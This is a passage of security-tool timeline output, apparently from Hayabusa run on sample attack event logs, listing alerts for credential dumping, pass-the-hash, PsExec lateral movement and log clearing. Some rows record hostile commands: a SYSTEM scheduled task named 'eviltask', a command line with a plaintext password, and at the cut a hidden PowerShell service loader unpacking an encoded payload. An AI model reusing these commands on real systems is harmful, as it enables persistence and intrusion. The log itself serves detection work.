2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-03-27 05:41:38.966 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
2021-03-27 05:41:39.009 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.296 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.306 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.860 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.861 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:20.254 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 
0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fd8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.363 
+09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1376020,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.364 +09:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 
10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.531 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula 
| Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:41:03.008 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:42:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:43:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote 
execution + admin share.evtx" 2021-04-21 22:30:00.569 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx 2021-04-21 22:30:00.589 +09:00,srvdefender01.offsec.lan,4698,info,,Task Created,"Name: \eviltask | Content: 2021-04-21T13:30:00 OFFSEC\admmig \eviltask PT1M false 2021-04-21T13:30:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\tools\shell.cmd S-1-5-18 LeastPrivilege | User: admmig | LID: 0x6fc89e",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx 2021-04-21 22:30:03.012 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx 2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 
0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx 2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 
10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx 2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
